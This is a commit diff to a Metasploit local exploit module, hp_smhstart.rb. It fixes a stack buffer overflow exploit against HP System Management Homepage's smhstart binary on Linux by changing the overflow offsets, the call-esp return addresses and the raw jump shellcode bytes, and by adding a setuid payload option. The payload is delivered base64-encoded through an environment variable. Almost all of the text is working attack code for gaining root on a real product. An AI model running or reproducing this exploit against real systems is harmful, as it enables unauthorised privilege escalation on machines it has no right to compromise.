decrement esp to fix crash in the middle of shellcode

Author: agix

modules/exploits/linux/local/hp_smhstart.rb

@@ -41,7 +41,7 @@ def initialize(info={})
 					],
 				'Platform'      => [ 'linux' ],
 				'Arch'          => [ ARCH_X86 ],
-				'SessionTypes'  => [ 'shell', 'meterpreter' ],
+				'SessionTypes'  => [ 'shell' ],
 				'Payload'		=>
 					{
 						'Space'     => 227,
@@ -57,17 +57,21 @@ def initialize(info={})
 							{
 								'Arch' => ARCH_X86,
 								'CallEsp' => 0x080c86eb,	#call esp
-								'Offset' => 64
+								'Offset' => 58
 							}
 						],
 						[ 'Hpsmh 7.1.2',
 							{
 								'Arch' => ARCH_X86,
 								'CallEsp' => 0x080c8b9b,	#call esp
-								'Offset' => 64
+								'Offset' => 58
 							}
 						],
 					],
+				'DefaultOptions' =>
+					{
+						'PrependSetuid'    => true
+					},
 				'DefaultTarget' => 0,
 				'DisclosureDate' => "Mar 30 2013",
 			}
@@ -81,9 +85,9 @@ def exploit
 		pl = payload.encoded
 		padding = rand_text_alpha(target['Offset'])
 		ret = [target['CallEsp']].pack('V')
-		exploit = Rex::Text.encode_base64("#{pl}#{ret}\xe8\x14\xff\xff\xff#{padding}")
+		exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
 		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
-		puts cmd_exec("#{datastore['smhstartDir']}/smhstart")
+		cmd_exec("#{datastore['smhstartDir']}/smhstart")
 	end
 
 end